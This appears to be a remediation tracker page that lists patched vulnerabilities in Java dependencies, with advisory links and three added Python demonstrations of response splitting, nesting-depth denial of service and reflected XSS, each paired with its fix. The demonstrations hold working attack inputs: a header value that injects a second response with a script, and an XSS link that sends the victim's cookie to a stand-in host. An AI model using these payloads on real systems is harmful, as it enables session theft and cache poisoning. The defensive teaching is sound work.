
Vulnerabilities Addressed

Addressed Vulnerability: FasterXML jackson-databind resource exhaustion (CVE-2022-42003)

*Issue Link:* [https://access.redhat.com/security/cve/CVE-2022-42003|https://access.redhat.com/security/cve/CVE-2022-42003|smart-link]

Addressed Vulnerability: Netty HTTP Response Splitting. When `DefaultHttpHeaders.set` is called with an iterator of values, header value validation is not performed, so a value containing CR/LF terminates the header block early and lets an attacker append headers or a complete second response.

*Issue Link:*

[https://security.snyk.io/vuln/SNYK-JAVA-IONETTY-3167773|https://security.snyk.io/vuln/SNYK-JAVA-IONETTY-3167773|smart-link]
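The following is an added illustration in Python, not code from Netty or from this page, of what the missing validation allows and what the check that closes it looks like. The response builder, header names, the attacker-controlled `Location` value and the two-response payload are all constructed for the example; only the CR/LF/NUL rule mirrors what HTTP header validation must enforce on every insertion path, including bulk insertion from an iterator.

```python
"""Added example: HTTP response splitting through an unvalidated header value,
and the per-value validation that prevents it. Not Netty's code."""


class HeaderSplittingError(ValueError):
    """Raised when a header value could terminate the header block."""


def validate_header_value(value: str) -> str:
    """Reject CR, LF and NUL in a header value (RFC 9110 field-value rules).

    A headers container must apply this on every insertion path; the bug
    described above is exactly one path (iterator insertion) that skipped it.
    """
    for ch in value:
        if ch in "\r\n\0":
            raise HeaderSplittingError(
                f"illegal control character {ch!r} in header value"
            )
    return value


def build_response(headers, body: str, validate: bool) -> bytes:
    """Serialise a minimal HTTP/1.1 response from an iterable of (name, value).

    validate=False mimics the vulnerable path: values are written verbatim.
    """
    lines = ["HTTP/1.1 200 OK"]
    for name, value in headers:
        if validate:
            value = validate_header_value(value)
        lines.append(f"{name}: {value}")
    lines.append(f"Content-Length: {len(body.encode())}")
    return ("\r\n".join(lines) + "\r\n\r\n" + body).encode()


def count_responses(raw: bytes) -> int:
    """Count the HTTP status lines a naive client would see in one byte stream."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1.1 "))


# Constructed attacker-controlled value: a redirect target that embeds the end of
# the first response and a complete second response carrying a script payload.
ATTACK_VALUE = (
    "/home\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)


def demo():
    """Return (responses seen without validation, whether validation blocked it)."""
    unvalidated = build_response(iter([("Location", ATTACK_VALUE)]), "", validate=False)
    try:
        build_response(iter([("Location", ATTACK_VALUE)]), "", validate=True)
        blocked = False
    except HeaderSplittingError:
        blocked = True
    return count_responses(unvalidated), blocked


if __name__ == "__main__":
    print(demo())
```

Without validation the single `Location` value yields two status lines on the wire, so a client or cache sees an attacker-authored second response; with validation the insertion fails before anything is written.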

Addressed Vulnerability: org.yaml:snakeyaml Denial of Service (CVE-2022-25857). The parser did not limit the nesting depth of collections, so a small document with deeply nested sequences or mappings could exhaust the stack or memory. The Red Hat entry is the RHEL-8 tracker for the same CVE; upgrade to 1.31 or later, which adds a nesting depth limit.

*Issue Links:*

1- [https://access.redhat.com/security/cve/CVE-2022-25857|https://access.redhat.com/security/cve/CVE-2022-25857|smart-link]

2- [https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360|https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360|smart-link]

3- [https://github.com/advisories/GHSA-3mc7-4q67-w48m|https://github.com/advisories/GHSA-3mc7-4q67-w48m|smart-link]

Addressed Vulnerability: Invalid HTTP requests in Reactor Netty HTTP Server may reveal access tokens. In versions 1.0.11 through 1.0.23, some invalid HTTP requests cause the server to log the request headers, so a valid access token carried in an Authorization header can end up in server logs, where anyone with log access can read it.

*Issue Link:*

[https://github.com/advisories/GHSA-7w4x-4h67-pgmv|https://github.com/advisories/GHSA-7w4x-4h67-pgmv|smart-link]

Addressed Vulnerability: com.squareup.okhttp3:okhttp vulnerable to Information Exposure

*Issue Link:*

[https://security.snyk.io/vuln/SNYK-JAVA-COMSQUAREUPOKHTTP3-2958044|https://security.snyk.io/vuln/SNYK-JAVA-COMSQUAREUPOKHTTP3-2958044|smart-link]

Addressed Vulnerability: XStream Denial of Service by injecting highly recursive collections or maps. Crafted input can contain self-referencing collections or maps whose hash code computation recurses without bound, or nesting deep enough to overflow the parser's stack; either ends in a StackOverflowError that terminates the application.

Issue Links:

1- [https://github.com/advisories/GHSA-rmr5-cpv2-vgjf|https://github.com/advisories/GHSA-rmr5-cpv2-vgjf|smart-link]

2- [https://security.snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977|https://security.snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977|smart-link]

3- [https://access.redhat.com/security/cve/CVE-2022-40151|https://access.redhat.com/security/cve/CVE-2022-40151|smart-link]

Addressed Vulnerability: Apache Commons BeanUtils 1.9.2. `PropertyUtilsBean` does not suppress the `class` property by default, so code that populates beans from untrusted input lets an attacker reach the class loader through the `class` property present on every Java object. Upgrade to 1.9.4, where the `SuppressPropertiesBeanIntrospector` that hides `class` is enabled by default.

*Issue Link:* [https://github.com/advisories/GHSA-6phf-73q6-gh87|https://github.com/advisories/GHSA-6phf-73q6-gh87|smart-link]

Addressed Vulnerability: Jettison Denial of Service by stack overflow in the `map` parameter (CVE-2022-40149). Parsing untrusted XML or JSON that is nested deeply enough overflows the stack and crashes the parser. Fixed in Jettison 1.5.1.

*Issue Links:*

1- [https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSJETTISON-3168084|https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSJETTISON-3168084|smart-link]

2- [https://access.redhat.com/security/cve/CVE-2022-40149|https://access.redhat.com/security/cve/CVE-2022-40149|smart-link]

Addressed Vulnerability: org.codehaus.jettison:jettison Denial of Service by out-of-memory (CVE-2022-40150). Crafted untrusted XML or JSON makes the parser allocate until the JVM runs out of memory. Fixed in Jettison 1.5.1.

*Issue Link:* [https://access.redhat.com/security/cve/CVE-2022-40150|https://access.redhat.com/security/cve/CVE-2022-40150|smart-link]

Addressed Vulnerability: Cross-site scripting vulnerability in swagger-ui 3.26.2

Additional information: [https://www.tenable.com/plugins/was/113267|https://www.tenable.com/plugins/was/113267|smart-link]

Addressed Vulnerability: com.fasterxml.woodstox:woodstox-core Denial of Service (SNYK-JAVA-COMFASTERXMLWOODSTOX-2928754). Parsing untrusted XML with DTD support enabled can overflow the stack on deeply nested input.

Source: [https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLWOODSTOX-2928754|https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLWOODSTOX-2928754|smart-link]

Addressed Vulnerability: com.google.code.gson:gson Deserialization of Untrusted Data (CVE-2022-25647). Versions before 2.8.9 are vulnerable via the `writeReplace()` method in internal classes, which can lead to Denial of Service.

Additional details here: [https://access.redhat.com/security/cve/CVE-2022-25647|https://access.redhat.com/security/cve/CVE-2022-25647|smart-link]

Addressed Vulnerability: Apache Xalan Java XSLT library - GHSA-9339-86wc-4qgf - SNYK-JAVA-XALAN-2953385 - CVE-2022-34169 - [poi-ooxml] (Document-Service). Processing a malicious XSLT stylesheet triggers an integer truncation in the internal XSLTC compiler, which can corrupt the generated Java class file and execute arbitrary Java bytecode.

Additional Info: [https://github.com/advisories/GHSA-9339-86wc-4qgf|https://github.com/advisories/GHSA-9339-86wc-4qgf|smart-link]

[xalan:xalan|http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xalan%22] is an XSLT processor for transforming XML documents into HTML, text, or other XML document types.

Addressed Vulnerability: In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because primitive value deserializers lack a check against deep wrapper-array nesting when the `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled (same issue as CVE-2022-42003 above; fixed in the 2.13.4.x micro releases and 2.14).
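The jackson-databind, SnakeYAML, Jettison, Woodstox and XStream entries above are all the same class of bug: a recursive parser with no bound on input nesting depth, so a few kilobytes of brackets exhaust the stack. This added example, written in Python rather than in any of those Java libraries and not taken from the page or the projects, shows the failure against a stock recursive JSON decoder and the pre-parse depth check that closes it. The depth limit, the sample documents and the function names are constructed for the example.

```python
"""Added example: unbounded nesting depth DoS and a linear-time depth guard.
Not code from jackson-databind, SnakeYAML, Jettison, Woodstox or XStream."""
import json

# Assumed policy limit for this example. SnakeYAML 1.31+ applies a similar
# default of 50; pick the smallest value your real documents need.
MAX_DEPTH = 64


def nesting_depth(text: str, limit: int = MAX_DEPTH) -> int:
    """Return the maximum bracket nesting depth of a JSON document.

    Brackets inside string literals are ignored (escapes handled), and the
    scan aborts with ValueError as soon as `limit` is exceeded, so a hostile
    document is rejected after reading only `limit + 1` opening brackets.
    """
    depth = max_depth = 0
    in_string = escaped = False
    for ch in text:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            if depth > limit:
                raise ValueError(f"nesting depth exceeds {limit}")
            max_depth = max(max_depth, depth)
        elif ch in "]}":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced closing bracket")
    return max_depth


def safe_loads(text: str, limit: int = MAX_DEPTH):
    """Hardened pattern: bound the depth before handing input to the parser."""
    nesting_depth(text, limit)
    return json.loads(text)


def parse_unguarded(text: str) -> str:
    """Vulnerable pattern: hand raw input straight to a recursive parser.

    Returns "parsed" or the name of the error the parser died with.
    """
    try:
        json.loads(text)
        return "parsed"
    except RecursionError:
        return "RecursionError"


# Constructed inputs: a hostile 200 KB document of pure nesting, and a benign
# one whose string value contains brackets that must not count toward depth.
DEEP = "[" * 100_000 + "]" * 100_000
BENIGN = '{"user": {"name": "a[b]{c}", "tags": [[1, 2], [3]]}}'


if __name__ == "__main__":
    print("unguarded:", parse_unguarded(DEEP))
    print("benign depth:", nesting_depth(BENIGN))
    try:
        safe_loads(DEEP)
    except ValueError as exc:
        print("guarded:", exc)
```

The same idea is what the patched Java libraries do internally (a depth counter checked on every nested open); the pre-scan here is the portable version you can put in front of any parser whose configuration you do not control.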

Vulnerability: libxml2 (CVE-2022-40303). Parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled can overflow several of the parser's integer counters.

Additional Info: [https://access.redhat.com/security/cve/CVE-2022-40303|https://access.redhat.com/security/cve/CVE-2022-40303|smart-link]

Addressed Vulnerability: [Git] - Integer overflow can result in arbitrary heap writes, which may allow arbitrary code execution.

CVEs:

Addressed Vulnerability: Apache Hadoop

1- [https://nvd.nist.gov/vuln/detail/CVE-2016-3086|https://nvd.nist.gov/vuln/detail/CVE-2016-3086|smart-link] - Critical - The YARN NodeManager in Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3 can leak the password for the credential store provider used by the NodeManager to YARN applications.

2- [https://nvd.nist.gov/vuln/detail/CVE-2021-37404|https://nvd.nist.gov/vuln/detail/CVE-2021-37404|smart-link] - Critical - There is a potential heap buffer overflow in the Apache Hadoop libhdfs native code. Opening a user-supplied file path without validation may result in a denial of service or arbitrary code execution. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.

Addressed Vulnerability: org.simpleframework:simple-xml - CVE-2017-1000190 - CRITICAL. SimpleXML (latest version 2.7.1) is vulnerable to XML External Entity (XXE) injection, which can result in SSRF, information disclosure, denial of service and similar attacks.

*Issue Link (AWS Inspector finding):* [CVE-2017-1000190|https://us-east-2.console.aws.amazon.com/inspector/v2/home?region=us-east-2#/findings?by=all&findingArn=arn:aws:inspector2:us-east-2:685917037183:finding/1081782d6faf01e0f61cf1fe918a77ab]

Addressed Vulnerability: Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed, so a single malicious upload (or a series of them) with a very large number of parts can cause a denial of service. Version 1.5 adds `FileUploadBase.setFileCountMax`, which, like the other upload limits, is not enabled by default and must be configured explicitly.

Additional details here:

[https://github.com/advisories/GHSA-hfrx-6qgj-fp6c|https://github.com/advisories/GHSA-hfrx-6qgj-fp6c|smart-link]

Addressed Vulnerability: Upgrade org.apache.poi:poi, org.apache.poi:poi-ooxml and org.apache.poi:poi-scratchpad from 5.0.0

Addressed Vulnerability: org.apache.santuario:xmlsec - [poi-ooxml] - GHSA-j8wc-gxx9-82hx - CVE-2021-40690. The `secureValidation` property is not passed through when a KeyInfo is built from a KeyInfoReference element, so an attacker can abuse an XPath Transform inside a RetrievalMethod element to read arbitrary local .xml files. Fixed in 2.1.7 and 2.2.3.

Additional info: [https://access.redhat.com/security/cve/CVE-2021-40690|https://access.redhat.com/security/cve/CVE-2021-40690|smart-link]

Vulnerability: org.apache.xmlgraphics:xmlgraphics-commons - [poi-ooxml] - GHSA-fmj2-7wx8-qj4v - CVE-2020-11988. Server-side request forgery: improper input validation in the XMPParser lets a specially crafted document make the server issue arbitrary GET requests. Fixed in 2.6.

More info: [https://github.com/advisories/GHSA-fmj2-7wx8-qj4v|https://github.com/advisories/GHSA-fmj2-7wx8-qj4v|smart-link]

Addressed Vulnerability: org.apache.xmlgraphics:batik-svgbrowser - [poi-ooxml] - SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1074910 - CVE-2022-41704

Additional info: [https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1074910|https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHEXMLGRAPHICS-1074910|smart-link]

Addressed Vulnerability: org.apache.xmlgraphics:batik - [poi-ooxml] - CVE-2022-40146 - CVE-2020-11987 - GHSA-2h63-qp69-fwvw - CVE-2022-42890. Batik's URL handling allows server-side request forgery (CVE-2020-11987 via the NodePickerPanel, CVE-2022-40146 via jar: URLs), and a crafted SVG can run untrusted Java code from JavaScript (CVE-2022-42890). All of these are fixed in Batik 1.16 or later.

Additional info here: [https://access.redhat.com/security/cve/CVE-2022-40146|https://access.redhat.com/security/cve/CVE-2022-40146|smart-link]

Vulnerability: Upgrade org.apache.pdfbox:pdfbox to version 2.0.23 or higher - [poi-ooxml] - SNYK-JAVA-ORGAPACHEPDFBOX-1088012 - SNYK-JAVA-ORGAPACHEPDFBOX-1088011 - SNYK-JAVA-ORGAPACHEPDFBOX-1304912 - SNYK-JAVA-ORGAPACHEPDFBOX-1304913

Additional Info: [org.apache.pdfbox:pdfbox|http://pdfbox.apache.org/] is an open source Java tool for working with PDF documents. Affected versions of this package are vulnerable to Denial of Service (DoS): a crafted PDF can drive the parser into an infinite loop or excessive memory use. The two later advisories (1304912 and 1304913) were fixed in 2.0.24, so upgrade to at least 2.0.24 to cover all four.

Addressed Vulnerability: Upgrade org.apache.xmlgraphics:batik-bridge to version 1.15 or higher - [poi-ooxml] - SNYK-JAVA-ORGAPACHEXMLGRAPHICS-3031729 - SNYK-JAVA-ORGAPACHEXMLGRAPHICS-3031730 - CVE-2022-40152. Note that CVE-2022-40152 itself is the Woodstox DTD-parsing Denial of Service listed above, not a Batik issue; the two Snyk identifiers are the Batik advisories.

Additional info:

Addressed: Remove the dependency on the Apache Commons JXPath package, which has an identified vulnerability (CVE-2022-41852).

Additional Info: [https://access.redhat.com/security/cve/CVE-2022-41852|https://access.redhat.com/security/cve/CVE-2022-41852|smart-link]: A flaw was found in the Apache Commons JXPath package. Every `JXPathContext` method that processes an XPath string (all except `compile()` and `compilePath()`) evaluates the expression with the interpreter, so an attacker who controls the expression can achieve remote code execution.

Addressed Vulnerability: Cross-site scripting at the API level. Reflected Cross-site Scripting (XSS) is another name for non-persistent or Type-I XSS, in which the payload is not stored by the vulnerable web application but is delivered when the victim loads a crafted URI; the server reflects the untrusted request input back into the response without encoding it, so the browser executes it in the application's origin.
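As an added illustration of the reflected case described above (Python, not code from the page or from any of the services it covers): the handler below echoes a query parameter into HTML verbatim, the hardened variant HTML-encodes on output, and the API variant returns JSON with a content type and `nosniff` header so the reflected text is never interpreted as markup. The endpoint, parameter name and attacker URL are constructed for the example.

```python
"""Added example: reflected XSS in an endpoint that echoes request input,
beside the output-encoded and JSON-API fixes. Not code from the page."""
import html
import json
from urllib.parse import parse_qs, urlsplit


def render_search_vulnerable(query: str) -> str:
    """Vulnerable handler: reflects the untrusted parameter into HTML verbatim."""
    return f"<p>Results for: {query}</p>"


def render_search_fixed(query: str) -> str:
    """Hardened handler: HTML-encode at output time so markup in the
    parameter is rendered as text. quote=True also covers attribute contexts."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def api_response(query: str):
    """API-level fix: answer as JSON, declare the content type, and forbid
    MIME sniffing so a browser never renders the echoed value as HTML."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, json.dumps({"query": query})


def handle(url: str, renderer) -> str:
    """Extract the `q` parameter the way a framework would and render it."""
    q = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return renderer(q)


def contains_script(page: str) -> bool:
    """Crude check a test harness can use: is there a live <script> tag?"""
    return "<script" in page.lower()


# Constructed attacker link: the victim only has to click it. Decoded, q is
# <script>document.location='https://evil.test/?'+document.cookie</script>
ATTACK_URL = (
    "https://api.example.test/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.test%2F%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


if __name__ == "__main__":
    print(handle(ATTACK_URL, render_search_vulnerable))
    print(handle(ATTACK_URL, render_search_fixed))
    print(api_response("<b>x</b>"))
```

The fix is applied where the value leaves the server, not where it arrives: input filtering is easy to bypass, while contextual output encoding (or not producing HTML at all) holds regardless of how the value was supplied.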